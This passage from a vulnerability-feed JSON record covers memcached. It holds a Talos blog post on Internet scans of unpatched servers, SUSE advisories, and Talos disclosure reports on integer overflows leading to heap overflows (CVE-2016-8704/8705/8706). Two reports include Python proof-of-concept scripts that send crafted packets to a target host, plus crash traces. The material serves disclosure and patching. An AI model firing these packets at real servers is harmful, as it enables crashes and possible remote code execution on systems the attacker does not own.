href=\"http://www.talosintelligence.com/reports/TALOS-2016-0220/\">http://www.talosintelligence.com/reports/TALOS-2016-0220/</a></li><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2016-0221/\">http://www.talosintelligence.com/reports/TALOS-2016-0221/</a></li><li><a href=\"https://access.redhat.com/security/cve/cve-2016-8704\">https://access.redhat.com/security/cve/cve-2016-8704</a></li><li><a href=\"https://www.ubuntu.com/usn/usn-3120-1/\">https://www.ubuntu.com/usn/usn-3120-1/</a></li></ul><h3 id=\"h.5mbd0jynb1ov\">MongoDB attacks of January 2017</h3><br />A slight detour. Sometime in late December/early January, news of a widespread attack on MongoDB servers surfaced.<br /><br />MongoDB is a memory resident, NoSQL database. 
Like memcached, it is never supposed to be exposed to an untrusted environment, which is often overlooked by developers, and sometimes production servers end up being freely accessible over the Internet.<br /><br />It is a well-known fact that many thousands of MongoDB servers are exposed over the Internet, but some criminal groups decided to weaponize this fact, aided by the lack of any form of authentication or access control, for profit. In a matter of days, thousands of these accessible MongoDB hosts were hit with a ransomware attack.<br /><br />Essentially, the bad guys connected to the server, siphoned all the data off of it and left a note requesting a certain amount of bitcoins as ransom for the data. Soon, it became apparent that multiple competing groups were attacking the same servers, which leads to the conclusion that there is no hope of actually recovering data, if there ever was in the first place.<br /><br />These attacks had widespread media coverage, which certainly led to higher awareness of this issue, and hopefully to fewer servers being exposed.<br /><h3 id=\"h.4p7rn2oe4z76\">Could Memcached face a similar fate?</h3><br />This whole MongoDB kerfuffle made us think about what the impact of a similar attack on memcached would be. Granted, memcached, unlike MongoDB, isn't a database, but it can still contain sensitive information, and disruption in the service availability would certainly lead to further disruptions on dependent services. Additionally, we could assess the potential attack surface for vulnerabilities that we found as well as see how widely the patch is applied.<br /><br />So we decided to scan the Internet and see...<br /><h3 id=\"h.6hbm56sxg6y7\">Scans</h3><br />In order to properly get the data we needed, a special scan had to be performed. 
We wanted a couple of data points:<br /><br /><ul><li>how many servers are directly accessible over the Internet</li><li>how many of those are still vulnerable</li><li>how many use authentication</li><li>how many of the servers with authentication enabled are still vulnerable</li></ul><br />We couldn't rely on the version reported by the server because, as mentioned before, many distributions backport security patches so the version string doesn't always reflect the patch level. Because of that, we devised a special test which would send a single packet to the server and could tell from the reply if the server was vulnerable or not.<br /><br />The first series of scans was conducted in late February. This first dataset led to another scan for authentication-enabled servers specifically, which was done in early March.<br /><h3 id=\"h.s569bgq4qc8g\">Results Of The Scans</h3><br />Gathering all the data revealed mostly expected results. More than 100,000 accessible servers, with almost 80% still vulnerable and only about 22% having authentication enabled. Interestingly, almost all servers with authentication enabled were still found to be vulnerable to CVE-2016-8706 which we specifically tested for. 
The exact numbers are as follows:<br /><br /><ul><li>Total servers with valid responses: 107786</li><li>Total servers still vulnerable: 85121 (~79%)</li><li>Total servers not vulnerable: 22665 (~21%)</li><li>Total servers requiring authentication: 23907 (~22%)</li><li>Total vulnerable servers requiring authentication: 23707 (~99%)</li></ul><br />The breakdown of numbers by country is, again, as expected:<br /><b>All servers</b><br /><ol><li>36937 - United States</li><li>18878 - China</li><li>5452 - United Kingdom</li><li>5314 - France</li><li>3901 - Russia</li><li>3698 - Germany</li><li>3607 - Japan</li><li>3464 - India</li><li>3287 - Netherlands</li><li>2443 - Canada</li></ol><b>Vulnerable servers</b><br /><ol><li>29660 - United States</li><li>16917 - China</li><li>4713 - United Kingdom</li><li>3209 - France</li><li>3047 - Germany</li><li>3003 - Japan</li><li>2556 - Netherlands</li><li>2460 - India</li><li>2266 - Russia</li><li>1820 - Hong Kong</li></ol><br />There are a couple of conclusions that can be drawn from this. First, there is a large number of easily accessible memcached servers on the Internet. Second, less than a quarter have authentication enabled, making the rest fully open to abuse even in the absence of exploitable remote code execution vulnerabilities. Third, people are slow to patch their existing servers, which leads to a large number of servers at risk of potential full compromise through vulnerabilities we reported. And fourth, a negligible number of servers with authentication enabled are also patched, leading to the conclusion that system administrators think authentication is enough and patches don't warrant updating. 
All four of these points are bad.<br /><h3 id=\"h.snvzk0d881xy\">Notifications</h3>After the scans were completed and conclusions were drawn, we made queries for all IP addresses to get contact emails for responsible organizations in order to send a notification with a simple explanation and suggestions to remedy this issue. This resulted in about 31 thousand unique emails which are pending notifications.<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-jZQaqu9pIDw/WWzGnAGIDYI/AAAAAAAAAUg/UIJLwX_fB-8Ga9Xb6-qaZUa2lvq9EG0CwCLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"768\" data-original-width=\"887\" height=\"554\" src=\"https://3.bp.blogspot.com/-jZQaqu9pIDw/WWzGnAGIDYI/AAAAAAAAAUg/UIJLwX_fB-8Ga9Xb6-qaZUa2lvq9EG0CwCLcBGAs/s640/image1.png\" width=\"640\" /></a></div><h3 id=\"h.346t0le9ohzt\">Redoing scans</h3><br />After notifications were sent, we repeated the scans six months later to see if the notifications had any significant impact. Overall the results were disappointing; it appears the notifications largely fell on deaf ears. As you can see below, only a small percentage, ~10%, of systems were patched. Additionally, there is still a significant number of servers that are vulnerable and still do not require authentication. What's even more disturbing is that it appears that 26% of the servers that were originally found are no longer online, but the number of systems that we found remained largely the same. 
This implies that either the systems just changed IP addresses or there is still a large number of new systems being deployed with the vulnerable version of Memcached.<br /><br /><h4 id=\"h.w6e0beqzftmt\">Results: 6 Months Later</h4><br />Total servers with valid responses: 106001<br /><br />Total servers still vulnerable: 73403 (~69%)<br /><br />Total servers not vulnerable: 32598 (~30%)<br /><br />Total servers requiring authentication: 18173 (~17%)<br /><br />Total vulnerable servers requiring authentication: 18012 (~99%)<br /><br /><h4 id=\"h.7iqaeiak70og\">Results: Original Servers (107,786) Updated Results</h4><br />Total: 85,121<br /><br />Still vulnerable: 53,621<br /><br />No longer vulnerable: 2,958<br /><br />Not online: 28,542 (~26%)<br /><br /><h3 id=\"h.nt3dvo7xe9p8\">Conclusion</h3><br />The severity of these types of vulnerabilities cannot be overstated. These vulnerabilities potentially affect a platform that is deployed across the Internet by small and large enterprises alike. With the recent spate of worm attacks leveraging vulnerabilities, this should be a red flag for administrators around the world. If left unaddressed, the vulnerabilities could be leveraged to impact organizations globally and impact business severely. 
It is highly recommended that these systems be patched immediately to help mitigate the risk to organizations.", "modified": "2017-07-21T14:25:15", "published": "2017-07-17T07:35:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2wKLra7iGPw/memcached-patch-failure.html", "id": "TALOSBLOG:C9CDF0BBD65EE0553C843FD8CACCB478", "title": "Memcached - A Story of Failed Patching & Vulnerable Servers", "type": "talosblog", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2018-03-22T20:37:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7291", "CVE-2016-8705", "CVE-2016-8704", "CVE-2013-0179", "CVE-2011-4971", "CVE-2013-7290", "CVE-2013-7239", "CVE-2017-9951", "CVE-2016-8706"], "description": "This update for memcached fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2011-4971: remote DoS (bsc#817781).\n - CVE-2013-0179: DoS when printing out keys to be deleted in verbose mode\n (bsc#798458).\n - CVE-2013-7239: SASL authentication allows wrong credentials to access\n memcache (bsc#857188).\n - CVE-2013-7290: remote DoS (segmentation fault) via a request to delete a\n key (bsc#858677).\n - CVE-2013-7291: remote DoS (crash) via a request that triggers \"unbounded\n key print\" (bsc#858676).\n - CVE-2016-8704: Server append/prepend remote code execution (bsc#1007871).\n - CVE-2016-8705: Server update remote code execution (bsc#1007870).\n - CVE-2016-8706: Server SASL authentication remote code execution\n (bsc#1007869).\n - CVE-2017-9951: Heap-based buffer over-read in try_read_command function\n (incomplete fix for 
CVE-2016-8705) (bsc#1056865).\n\n", "edition": 1, "modified": "2018-03-22T17:27:53", "published": "2018-03-22T17:27:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00052.html", "id": "SUSE-SU-2018:0778-1", "type": "suse", "title": "Security update for memcached (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-26T16:42:30", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7291", "CVE-2016-8705", "CVE-2016-8704", "CVE-2013-0179", "CVE-2011-4971", "CVE-2013-7290", "CVE-2013-7239", "CVE-2017-9951", "CVE-2016-8706"], "description": "This update for memcached fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2011-4971: remote DoS (bsc#817781).\n - CVE-2013-0179: DoS when printing out keys to be deleted in verbose mode\n (bsc#798458).\n - CVE-2013-7239: SASL authentication allows wrong credentials to access\n memcache (bsc#857188).\n - CVE-2013-7290: remote DoS (segmentation fault) via a request to delete a\n key (bsc#858677).\n - CVE-2013-7291: remote DoS (crash) via a request that triggers \"unbounded\n key print\" (bsc#858676).\n - CVE-2016-8704: Server append/prepend remote code execution (bsc#1007871).\n - CVE-2016-8705: Server update remote code execution (bsc#1007870).\n - CVE-2016-8706: Server SASL authentication remote code execution\n (bsc#1007869).\n - CVE-2017-9951: Heap-based buffer over-read in try_read_command function\n (incomplete fix for CVE-2016-8705) (bsc#1056865).\n\n", "edition": 1, "modified": "2018-03-26T15:09:40", "published": "2018-03-26T15:09:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00059.html", "id": "SUSE-SU-2018:0807-1", "type": "suse", "title": "Security update for memcached (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talos": [{"lastseen": "2020-07-01T21:25:06", "bulletinFamily": "info", "cvelist": ["CVE-2016-8706"], 
"description": "# Talos Vulnerability Report\n\n### TALOS-2016-0221\n\n## Memcached Server SASL Autentication Remote Code Execution Vulnerability\n\n##### October 31, 2016\n\n##### CVE Number\n\nCVE-2016-8706\n\n### Summary\n\nAn integer overflow in process_bin_sasl_auth function which is responsible for authentication commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.\n\n### Tested Versions\n\nMemcached 1.4.31\n\n### Product URLs\n\n<https://memcached.org/>\n\n### CVSSv3 Score\n\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### Details\n\nMemcached is a high performance object caching server intended for speeding up dynamic web applications and is used by some of the most popular Internet websites. It has two versions of the protocol for storing and retrieving arbitrary data, an ASCII based one and a binary one. The binary protocol is optimized for size.\n\nIf enabled during compilation, Memcached can support authentication using SASL. An integer overflow can be triggered by sending a specially crafted authentication command. 
The affected command is SASL Auth whose opcode is 0x21.\n\nThe function responsible for parsing an authentication packet is `process_bin_sasl_auth`:\n \n \n static void process_bin_sasl_auth(conn *c) {\n // Guard for handling disabled SASL on the server.\n if (!settings.sasl) {\n write_bin_error(c, PROTOCOL_BINARY_RESPONSE_UNKNOWN_COMMAND, NULL,\n c->binary_header.request.bodylen\n - c->binary_header.request.keylen);\n return;\n }\n \n assert(c->binary_header.request.extlen == 0);\n \n int nkey = c->binary_header.request.keylen;\t\t[1]\n int vlen = c->binary_header.request.bodylen - nkey;\t[2]\n \n if (nkey > MAX_SASL_MECH_LEN) {\t\t\t[3]\n write_bin_error(c, PROTOCOL_BINARY_RESPONSE_EINVAL, NULL, vlen);\n c->write_and_go = conn_swallow;\n return;\n }\n \n char *key = binary_get_key(c);\n assert(key);\n \n item *it = item_alloc(key, nkey, 0, 0, vlen); [4]\n \n\nIn the above code, it should be noted that at [1] `nkey` is declared as a signed integer, and at [2] an integer overflow is possible if the value of `bodylen` is less than `nkey` resulting in a small or possibly negative value of `vlen` which is then used at [4] in a call to `item_alloc`. At [3] a check limits the values `nkey` can take (MAX_SASL_MECH_LEN is 32).\n\nFunction `item_alloc` is a wrapper around `do_item_alloc` which allocates the memory for the item and copies the key:\n \n \n ...\n size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, &nsuffix); [1]\n ...\n it = slabs_alloc(ntotal, id, &total_bytes, 0);\t\t\t\t[2]\n \n ...\n memcpy(ITEM_key(it), key, nkey);\t\t\t\t\t\t[3]\n it->exptime = exptime;\n memcpy(ITEM_suffix(it), suffix, (size_t)nsuffix);\n it->nsuffix = nsuffix;\n \n\nAt [1], `nkey` corresponds to the specified key length and `nbytes` to the previously calculated `vlen` value. At [2] the total resulting value is used as the size for allocation which ends up being too small to hold the key which leads to a heap buffer overflow at [3]. 
At the time of the overflow, the contents of `nkey` and the contents of memory pointed to by `key` are under direct control of the attacker.\n\nThe following packet has all the conditions to trigger the vulnerability:\n \n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_SET = \"\\x21\"\n key_len = struct.pack(\"!H\",32)\n body_len = struct.pack(\"!I\",1)\n packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + \"A\"*1000\n \n\nIn the above packet, body length is specified to be 1, and key length 32, resulting in an integer overflow which causes too little memory to be allocated, causing a heap buffer overflow during a memcpy call.\n\n### Crash Information\n\nSimply sending the above packet triggers the heap overflow but doesn\u2019t cause a direct crash. In order to observe the issue, the server can be run under valgrind (with SASL authentication enabled) which then results in the following trace:\n \n \n <36 new binary client connection.\n 36: going from conn_new_cmd to conn_waiting\n 36: going from conn_waiting to conn_read\n 36: going from conn_read to conn_parse_cmd\n <36 Read binary protocol data:\n <36 0x80 0x21 0x00 0x20\n <36 0x00 0x00 0x00 0x01\n <36 0x00 0x00 0x00 0x01\n <36 0x41 0x41 0x41 0x41\n <36 0x41 0x41 0x41 0x41\n <36 0x41 0x41 0x41 0x41\n authenticated() in cmd 0x21 is true\n 36: going from conn_parse_cmd to conn_nread\n ==601== Thread 3:\n ==601== Invalid write of size 4\n ==601== at 0x8059DD8: do_item_alloc (items.c:242)\n ==601== by 0x8050565: process_bin_sasl_auth (memcached.c:1881)\n ==601== by 0x8050565: complete_nread_binary (memcached.c:2450)\n ==601== by 0x8050565: complete_nread (memcached.c:2484)\n ==601== by 0x80540AE: drive_machine (memcached.c:4656)\n ==601== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==601== by 0x805B1B8: worker_libevent (thread.c:380)\n ==601== by 0x40CB312: start_thread (pthread_create.c:310)\n ==601== by 0x41DAF2D: clone (clone.S:122)\n ==601== Address 0x45adc25 is 
1,048,557 bytes inside a block of size 1,048,560 alloc'd\n ==601== at 0x402B211: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==601== by 0x8056218: memory_allocate (slabs.c:538)\n ==601== by 0x8056218: do_slabs_newslab (slabs.c:233)\n ==601== by 0x8056295: do_slabs_alloc (slabs.c:328)\n ==601== by 0x8056843: slabs_alloc (slabs.c:584)\n ==601== by 0x8059B7D: do_item_alloc (items.c:180)\n ==601== by 0x8050565: process_bin_sasl_auth (memcached.c:1881)\n ==601== by 0x8050565: complete_nread_binary (memcached.c:2450)\n ==601== by 0x8050565: complete_nread (memcached.c:2484)\n ==601== by 0x80540AE: drive_machine (memcached.c:4656)\n ==601== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==601== by 0x805B1B8: worker_libevent (thread.c:380)\n ==601== by 0x40CB312: start_thread (pthread_create.c:310)\n ==601== by 0x41DAF2D: clone (clone.S:122)\n ==601==\n \n\n### Exploit Proof-of-Concept (optional)\n \n \n import struct\n import socket\n import sys\n \n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_SET = \"\\x21\"\n key_len = struct.pack(\"!H\",32)\n body_len = struct.pack(\"!I\",1)\n packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + \"A\"*1000\n if len(sys.argv) != 3:\n \tprint \"./poc_sasl.py <server> <ip>\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((sys.argv[1],int(sys.argv[2])))\n s.sendall(packet)\n print s.recv(1024)\n s.close()\n \n\n### Timeline\n\n2016-10-10 - Vendor Disclosure \n2016-10-12 - Vendor Patched \n2016-10-31 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0220\n\nPrevious Report\n\nTALOS-2016-0183\n", "edition": 11, "modified": "2016-10-31T00:00:00", "published": "2016-10-31T00:00:00", "id": "TALOS-2016-0221", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0221", "title": "Memcached Server SASL Autentication Remote Code Execution 
Vulnerability", "type": "talos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-01T21:25:37", "bulletinFamily": "info", "cvelist": ["CVE-2016-8705"], "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0220\n\n## Memcached Server Update Remote Code Execution Vulnerability\n\n##### October 31, 2016\n\n##### CVE Number\n\nCVE-2016-8705\n\n### Summary\n\nMultiple integer overflows in process_bin_update function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.\n\n### Tested Versions\n\nMemcached 1.4.31\n\n### Product URLs\n\n<https://memcached.org/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### Details\n\nMemcached is a high performance object caching server intended for speeding up dynamic web applications and is used by some of the most popular Internet websites. It has two versions of the protocol for storing and retrieving arbitrary data, an ASCII based one and a binary one. The binary protocol is optimized for size.\n\nAn integer overflow can be triggered by issuing a command that adds or replaces an existing key-value pair. The affected commands are: Set (opcode 0x01), Add (opcode 0x02), Replace (opcode 0x03) , SetQ (opcode 0x11), AddQ (opcode 0x12) and ReplaceQ (opcode 0x13) which all call into `process_bin_update` function.\n\nWhile parsing a binary packet, the process ends up in the following switch case in `memcached.c`:\n \n \n case PROTOCOL_BINARY_CMD_SET: /* FALLTHROUGH */\n case PROTOCOL_BINARY_CMD_ADD: /* FALLTHROUGH */\n case PROTOCOL_BINARY_CMD_REPLACE:\n if (extlen == 8 && keylen != 0 && bodylen >= (keylen + 8)) {\n bin_read_key(c, bin_reading_set_header, 8);\n } else {\n protocol_error = 1;\n }\n \n\nIf any of the `set`,`add` and `replace` (or their quiet equivalents) is received a check is made before calling `bin_read_key`. 
It should be noted that `keylen` and `bodylen` are of type `int` and `uint32_t` respectively. In `dispatch_bin_command`:\n \n \n int extlen = c->binary_header.request.extlen;\n int keylen = c->binary_header.request.keylen;\n uint32_t bodylen = c->binary_header.request.bodylen;\n \n\nThis is the first condition that must hold in order to reach the vulnerability. After reading the key, the process ends up in the `process_bin_update` function, where the integer overflow happens:\n \n \n static void process_bin_update(conn *c) {\n char *key;\n int nkey;\t\t\t\t\t\t\t[1]\n int vlen;\t\t\t\t\t\t\t[2]\n item *it;\n protocol_binary_request_set* req = binary_get_request(c);\n \n assert(c != NULL);\n \n key = binary_get_key(c);\n nkey = c->binary_header.request.keylen;\n \n /* fix byteorder in the request */\n req->message.body.flags = ntohl(req->message.body.flags);\n req->message.body.expiration = ntohl(req->message.body.expiration);\n \n vlen = c->binary_header.request.bodylen - (nkey + c->binary_header.request.extlen); [3]\n \n\nNotice that at [1] and [2] `nkey` and `vlen` are of type `int` and recall that `bodylen` is an unsigned integer. Because of the difference in signedness between `bodylen` and `vlen` an integer overflow can occur resulting in a negative value of `vlen` at [3]. The first required check has passed because integer promotions work in our favor, but in the second case, the final value of the arithmetic expression at [3] (an unsigned value) gets assigned to a signed value. 
The value in `vlen` is then used to allocate and store an item:\n \n \n it = item_alloc(key, nkey, req->message.body.flags,\n realtime(req->message.body.expiration), vlen+2);\n \n\nFunction `item_alloc` is a wrapper around `do_item_alloc` which allocates the memory for the item and copies the key:\n \n \n ...\n size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, &nsuffix); [1]\n ...\n it = slabs_alloc(ntotal, id, &total_bytes, 0);\t\t\t\t[2]\n \n ...\n memcpy(ITEM_key(it), key, nkey);\t\t\t\t\t\t[3]\n it->exptime = exptime;\n memcpy(ITEM_suffix(it), suffix, (size_t)nsuffix);\n it->nsuffix = nsuffix;\n \n\nAt [1], `nkey` corresponds to the specified key length and `nbytes` to the previously calculated `vlen` value. At [2] the total resulting value is used as the size for allocation which ends up being too small to hold the key which leads to a heap buffer overflow at [3]. At the time of the overflow, the contents of `nkey` and the contents of memory pointed to by `key` are under direct control of the attacker.\n\nThe following packet has all the conditions necessary to trigger the vulnerability:\n \n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_ADD = \"\\x02\"\n key_len = struct.pack(\"!H\",0xfa)\n extra_len = \"\\x08\"\n data_type = \"\\x00\"\n vbucket = \"\\x00\\x00\"\n body_len = struct.pack(\"!I\",0xffffffd0)\n opaque = struct.pack(\"!I\",0)\n CAS = struct.pack(\"!Q\",0)\n extras_flags = 0xdeadbeef\n extras_expiry = struct.pack(\"!I\",0xe10)\n body = \"A\"*1024\n \n\nThe value of `extra_len` must be 0x8 as it is directly checked. The value of `body_len` must be greater than `key_len` when compared as unsigned integers, `key_len` also has to be greater than 0. Other checks in the code constrain the value of `body_len` required to trigger the vulnerability to the 0xFFFFFFF0-0xFFFFFFFF range.\n\nThe vulnerability can be triggered multiple times, and can be abused to modify internal slab metadata. 
As such, it can also be abused to cause information leaks required for successful exploitation.\n\n### Crash Information\n\nSimply sending the above packet triggers the heap overflow but doesn\u2019t cause a direct crash. In order to observe the issue, the server can be run under valgrind which then results in the following crash:\n \n \n <30 new auto-negotiating client connection\n 30: going from conn_new_cmd to conn_waiting\n 30: going from conn_waiting to conn_read\n 30: going from conn_read to conn_parse_cmd\n 30: Client using the binary protocol\n <30 Read binary protocol data:\n <30 0x80 0x02 0x00 0xfa\n <30 0x08 0x00 0x00 0x00\n <30 0xff 0xff 0xff 0xd0\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n 30: going from conn_parse_cmd to conn_nread\n <30 ADD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Value len is -306\n ==32759== Thread 3:\n ==32759== Invalid write of size 4\n ==32759== at 0x402FCC2: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==32759== by 0x8059CB9: do_item_alloc (items.c:240)\n ==32759== by 0x8050CBC: process_bin_update (memcached.c:2222)\n ==32759== by 0x8050CBC: complete_nread_binary (memcached.c:2427)\n ==32759== by 0x8050CBC: complete_nread (memcached.c:2484)\n ==32759== by 0x80540AE: drive_machine (memcached.c:4656)\n ==32759== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==32759== by 0x805B1B8: worker_libevent (thread.c:380)\n ==32759== by 0x40CB312: start_thread (pthread_create.c:310)\n ==32759== by 0x41DAF2D: clone (clone.S:122)\n ==32759== Address 0x459cc48 is 0 bytes after a block of size 1,048,560 alloc'd\n ==32759== at 0x402B211: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==32759== by 0x8056218: memory_allocate (slabs.c:538)\n 
==32759== by 0x8056218: do_slabs_newslab (slabs.c:233)\n ==32759== by 0x8056295: do_slabs_alloc (slabs.c:328)\n ==32759== by 0x8056843: slabs_alloc (slabs.c:584)\n ==32759== by 0x8059B7D: do_item_alloc (items.c:180)\n ==32759== by 0x8050CBC: process_bin_update (memcached.c:2222)\n ==32759== by 0x8050CBC: complete_nread_binary (memcached.c:2427)\n ==32759== by 0x8050CBC: complete_nread (memcached.c:2484)\n ==32759== by 0x80540AE: drive_machine (memcached.c:4656)\n ==32759== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==32759== by 0x805B1B8: worker_libevent (thread.c:380)\n ==32759== by 0x40CB312: start_thread (pthread_create.c:310)\n ==32759== by 0x41DAF2D: clone (clone.S:122)\n ==32759==\n \n\n### Exploit Proof-of-Concept (optional)\n \n \n import struct\n import socket\n import sys\n \n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_ADD = \"\\x02\"\n key_len = struct.pack(\"!H\",0xfa)\n extra_len = \"\\x08\"\n data_type = \"\\x00\"\n vbucket = \"\\x00\\x00\"\n body_len = struct.pack(\"!I\",0xffffffd0)\n opaque = struct.pack(\"!I\",0)\n CAS = struct.pack(\"!Q\",0)\n extras_flags = 0xdeadbeef\n extras_expiry = struct.pack(\"!I\",0xe10)\n body = \"A\"*1024\n \n packet = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len\n packet += data_type + vbucket + body_len + opaque + CAS\n packet += body\n if len(sys.argv != 3):\n \tprint \"./poc_add.py <server> <port>\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((sys.argv[1],int(sys.argv[2])))\n s.sendall(packet)\n print s.recv(1024)\n s.close()\n \n\n### Timeline\n\n2016-10-10 - Vendor Disclosure \n2016-10-12 - Vendor Patched \n2016-10-31 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0219\n\nPrevious Report\n\nTALOS-2016-0221\n", "edition": 11, "modified": "2016-10-31T00:00:00", "published": "2016-10-31T00:00:00", "id": "TALOS-2016-0220", "href": 
"http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0220", "title": "Memcached Server Update Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-01T21:24:54", "bulletinFamily": "info", "cvelist": ["CVE-2016-8704"], "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0219\n\n## Memcached Server Append/Prepend Remote Code Execution Vulnerability\n\n##### October 31, 2016\n\n##### CVE Number\n\nCVE-2016-8704\n\n### Summary\n\nAn integer overflow in the process_bin_append_prepend function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.\n\n### Tested Versions\n\nMemcached 1.4.31\n\n### Product URLs\n\n<https://memcached.org/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### Details\n\nMemcached is a high performance object caching server intended for speeding up dynamic web applications and is used by some of the most popular Internet websites. It has two versions of the protocol for storing and retrieving arbitrary data, an ASCII based one and a binary one. The binary protocol is optimized for size.\n\nAn integer overflow can be triggered by issuing a command that appends or prepends data to an existing key-value pair. 
Affected commands are: Append (opcode 0x0e), Prepend (opcode 0x0f), AppendQ (0x19), PrependQ (opcode 0x1a) which all call into `process_bin_append_prepend` function.\n\nWhile parsing a binary packet, the process ends up in the following switch case in `memcached.c`:\n \n \n case PROTOCOL_BINARY_CMD_APPEND:\n case PROTOCOL_BINARY_CMD_PREPEND:\n if (keylen > 0 && extlen == 0) {\n bin_read_key(c, bin_reading_set_header, 0);\n } else {\n protocol_error = 1;\n }\n break;\n \n\nIf either the `append` or `prepend` commands (or their quiet equivalents) are executed, no check is made on the specified value of the body length.\n\nAfter reading the key, the parser ends up in the following code:\n \n \n static void process_bin_append_prepend(conn *c) {\n char *key;\n int nkey;\n int vlen; [1]\n item *it;\n \n assert(c != NULL);\n \n key = binary_get_key(c);\n nkey = c->binary_header.request.keylen;\t[2]\n vlen = c->binary_header.request.bodylen - nkey; [3]\n \n if (settings.verbose > 1) {\n fprintf(stderr, \"Value len is %d\\n\", vlen);\n }\n \n if (settings.detail_enabled) {\n stats_prefix_record_set(key, nkey);\n }\n \n it = item_alloc(key, nkey, 0, 0, vlen+2); [4]\n \n\nNotice that at [1] `nkey` and `vlen` are signed integers. At [2] `keylen`, which is unsigned, gets assigned to `nkey` (signed). At [3], an integer overflow can occur if `bodylen` is less than `nkey` both of which come directly from the network and are under direct attacker control. The value of `vlen` can end up being small and even negative and is later used in `item_alloc`. 
Function `item_alloc` is a wrapper around `do_item_alloc` which allocates the memory for the item and copies the key:\n \n \n ...\n size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, &nsuffix); [1]\n ...\n it = slabs_alloc(ntotal, id, &total_bytes, 0);\t\t\t\t[2]\n \n ...\n memcpy(ITEM_key(it), key, nkey);\t\t\t\t\t\t[3]\n it->exptime = exptime;\n memcpy(ITEM_suffix(it), suffix, (size_t)nsuffix);\n it->nsuffix = nsuffix;\n \n\nAt [1], `nkey` corresponds to the specified key length and `nbytes` to the previously calculated `vlen` value. At [2] the total resulting value is used as the size for allocation which ends up being too small to hold the key which leads to a heap buffer overflow at [3]. At the time of the overflow, the contents of `nkey` and the contents of the memory pointed to by `key` are under direct control of the attacker.\n\nThe following packet has all the conditions necessary to trigger the vulnerability:\n \n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_PREPEND = \"\\x0f\"\n key_len = struct.pack(\"!H\",0xfa)\n extra_len = \"\\x00\"\n data_type = \"\\x00\"\n vbucket = \"\\x00\\x00\"\n body_len = struct.pack(\"!I\",0)\n opaque = struct.pack(\"!I\",0)\n CAS 